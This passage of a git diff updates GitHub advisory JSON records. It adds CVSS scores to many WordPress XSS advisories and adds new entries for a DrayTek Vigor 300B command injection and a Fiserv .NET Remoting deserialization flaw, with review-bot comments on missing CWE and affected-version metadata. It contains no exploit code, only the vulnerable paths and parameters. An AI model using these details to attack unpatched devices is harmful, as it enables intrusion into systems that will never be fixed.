a/advisories/unreviewed/2026/02/GHSA-9xx2-jmjv-w5vp/GHSA-9xx2-jmjv-w5vp.json b/advisories/unreviewed/2026/02/GHSA-9xx2-jmjv-w5vp/GHSA-9xx2-jmjv-w5vp.json new file mode 100644 index 0000000000000..09dd9bf9dc907 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9xx2-jmjv-w5vp/GHSA-9xx2-jmjv-w5vp.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xx2-jmjv-w5vp", + "modified": "2026-02-24T00:31:33Z", + "published": "2026-02-24T00:31:33Z", + "aliases": [ + "CVE-2026-3040" + ], + "details": "A vulnerability was identified in DrayTek Vigor 300B up to 1.5.1.6. This affects the function cgiGetFile of the file /cgi-bin/mainfunction.cgi/uploadlangs of the component Web Management Interface. The manipulation of the argument File leads to os command injection. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor confirms that \"300B is EoL, and this is an authenticated vulnerability. We don't plan to fix it.\" This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3040" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/42" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347394" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347394" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757126" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T22:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json b/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json index 0c2b2327fbe4e..219034d3b1db9 100644 
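Review bot: GHSA-9xx2-jmjv-w5vp.json classifies the issue as `"CWE-77"`, while `details` describes OS command injection through the `File` argument of `cgiGetFile`; `"CWE-78"` is the more specific class and the one a CWE filter for OS command injection would look for. The vendor statement that the 300B is end-of-life and will not be fixed appears only in the `details` prose, and `affected` is empty, so nothing machine-readable tells a consumer that no patched version will exist. Readers acting on this record should plan on restricting access to the web management interface rather than waiting for an update.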
--- a/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json +++ b/advisories/unreviewed/2026/02/GHSA-cvm5-m63f-8wmv/GHSA-cvm5-m63f-8wmv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cvm5-m63f-8wmv", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68843" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bas Schuiling FeedWordPress Advanced Filters faf allows Reflected XSS.This issue affects FeedWordPress Advanced Filters: from n/a through <= 0.6.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json b/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json index eb47df052da3f..0f30c4eb31af6 100644 --- a/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json +++ b/advisories/unreviewed/2026/02/GHSA-f6pr-2mv6-45fq/GHSA-f6pr-2mv6-45fq.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f6pr-2mv6-45fq", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68846" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paris Holley Asynchronous Javascript asynchronous-javascript allows Reflected XSS.This issue affects Asynchronous Javascript: from n/a through <= 1.3.5.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json b/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json index fe2cdcbe77e28..6ba514a498948 100644 --- a/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json +++ b/advisories/unreviewed/2026/02/GHSA-fc39-6hhj-gr5p/GHSA-fc39-6hhj-gr5p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fc39-6hhj-gr5p", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67971" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPManageNinja FluentCart fluent-cart allows Reflected XSS.This issue affects FluentCart: from n/a through < 1.3.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:03Z" 
diff --git a/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json b/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json index df9d8756a17e9..49364c356264d 100644 --- a/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json +++ b/advisories/unreviewed/2026/02/GHSA-g3qj-5j85-8w2c/GHSA-g3qj-5j85-8w2c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-g3qj-5j85-8w2c", - "modified": "2026-02-20T18:31:33Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:33Z", "aliases": [ "CVE-2025-53228" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jezza101 bbpress Simple Advert Units bbpress-simple-advert-units allows Reflected XSS.This issue affects bbpress Simple Advert Units: from n/a through <= 0.41.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:01Z" diff --git a/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json b/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json index 6bf8778540ce5..4a2d549665e29 100644 --- a/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json +++ b/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gv3f-578r-jhf3", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67990" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 GMap Targeting gmap-targeting allows Reflected XSS.This issue affects GMap Targeting: from n/a through <= 1.1.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h68v-wm52-cjcj/GHSA-h68v-wm52-cjcj.json b/advisories/unreviewed/2026/02/GHSA-h68v-wm52-cjcj/GHSA-h68v-wm52-cjcj.json new file mode 100644 index 0000000000000..20ca40487093c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h68v-wm52-cjcj/GHSA-h68v-wm52-cjcj.json 
@@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h68v-wm52-cjcj", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-21665" + ], + "details": "The Print Service component of Fiserv Originate Loans Peripherals (formerly Velocity Services) in unsupported version 2021.2.4 (build 4.7.3155.0011) uses deprecated .NET Remoting TCP channels that allow unsafe deserialization of untrusted data. When these services are exposed to an untrusted network in a client-managed deployment, an unauthenticated attacker can achieve remote code execution. Version 2021.2.4 is no longer supported by Fiserv. Customers should upgrade to a currently supported release (2025.1 or later) and ensure that .NET Remoting service ports are not exposed beyond trusted network boundaries.\n\nThis CVE documents behavior observed in a client-hosted deployment running an unsupported legacy version of Originate Loans Peripherals with .NET Remoting ports exposed to an untrusted network. This is not a default or supported configuration. Customers running legacy versions should upgrade to a currently supported release and ensure .NET Remoting ports are restricted to trusted network segments. 
The finding does not apply to Fiserv-hosted environments.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21665" + }, + { + "type": "WEB", + "url": "https://learn.microsoft.com/en-us/dotnet/core/compatibility/core-libraries/5.0/remoting-apis-obsolete" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json b/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json index 59f259e688502..026ac783fcb0f 100644 --- a/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json +++ b/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hc97-m5vw-hgpf", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69385" ], "details": "Missing Authorization vulnerability in AgniHD Cartify - WooCommerce Gutenberg WordPress Theme cartify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cartify - WooCommerce Gutenberg WordPress Theme: from n/a through <= 1.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:23Z" 
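Review bot: GHSA-h68v-wm52-cjcj.json is added with `"cwe_ids": []` even though `details` gives the root cause as unsafe deserialization of untrusted data over .NET Remoting TCP channels; `"cwe_ids": ["CWE-502"]` would match that description and keep the record visible to CWE-based queries. Only a CVSS_V4 vector is present, so tooling that reads `CVSS_V3` entries gets no score for an issue described as unauthenticated remote code execution. The remediation (upgrade to 2025.1 or later, keep the Remoting ports on trusted network segments) is likewise only in prose, because `affected` is empty.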
diff --git a/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json b/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json index 05508e3ee2c20..4be02a4da1f82 100644 --- a/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json +++ b/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j69g-gh5p-j2j3", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67978" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FixBD Educare educare allows Reflected XSS.This issue affects Educare: from n/a through <= 1.6.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json b/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json index 80b8de848cb63..353aefc87743d 100644 --- a/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json +++ b/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jxq5-ggfq-q36w", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69386" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realvirtualmx RVCFDI para Woocommerce rvcfdi-para-woocommerce allows Reflected XSS.This issue affects RVCFDI para Woocommerce: from n/a through <= 8.1.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:23Z" diff --git a/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json b/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json index 58423c0a7cd28..f14ea4e1a69d3 100644 --- a/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json +++ b/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m78j-wv7w-r94w", - "modified": "2026-02-20T18:31:33Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:33Z", "aliases": [ "CVE-2025-53233" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RylanH Storyform storyform allows Reflected XSS.This issue affects Storyform: from n/a through <= 0.6.14.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:02Z" 
diff --git a/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json b/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json index 100d5087ba629..b2d7a7aaef484 100644 --- a/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json +++ b/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mhvh-7hfw-2pcj", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67984" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in calliko NPS computy nps-computy allows DOM-Based XSS.This issue affects NPS computy: from n/a through <= 2.8.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json b/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json index 5bba14e15ed13..7bd1602891ced 100644 --- a/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json +++ b/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mq7f-f783-pc94", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-24949" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods PhotoMe photome allows DOM-Based XSS.This issue affects PhotoMe: from n/a through <= 5.7.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json b/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json index d505c54d8ccaf..4871d66a695e5 100644 --- a/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json +++ b/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mqj4-m7cg-hx46", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68501" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mollie Mollie Payments for WooCommerce mollie-payments-for-woocommerce allows Reflected XSS.This issue affects Mollie Payments for WooCommerce: from n/a through <= 8.1.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json b/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json index d9dbefe94ac9d..2a337f5f8d8c5 100644 --- a/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json +++ b/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mvmh-gv2w-6hrm", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69323" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs Slimstat Analytics wp-slimstat allows Reflected XSS.This issue affects Slimstat Analytics: from n/a through <= 5.3.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:19Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json b/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json index e122c38294277..c7dc55cf19c12 100644 --- a/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json +++ b/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mvp7-2m2r-2548", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-69296" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GhostPool Aardvark aardvark allows Reflected XSS.This issue affects Aardvark: from n/a through <= 4.6.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:16Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json index 7c8bdd909df0a..b5fecb2639d8d 100644 --- a/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json +++ b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pf6r-4hv7-pr4f", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67991" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Reflected XSS.This issue affects User Extra Fields: from n/a through <= 16.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:05Z" 
diff --git a/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json index 90471ced8be2b..f5ede98af9cdb 100644 --- a/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json +++ b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pj5w-7j3v-9wwv", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68854" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in harman79 ID Arrays id-arrays allows DOM-Based XSS.This issue affects ID Arrays: from n/a through <= 2.1.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json index cb1f59587984f..c83a3184a4fac 100644 --- a/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json +++ b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pjx3-8fqj-x6hr", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67972" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Prague prague-plugins allows Reflected XSS.This issue affects Prague: from n/a through <= 2.2.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json index e7cfd796fb0c4..e41fbd68931b8 100644 --- a/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json +++ b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pq2q-m7vr-7342", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69391" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Diamond diamond allows Reflected XSS.This issue affects Diamond: from n/a through <= 2.4.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ 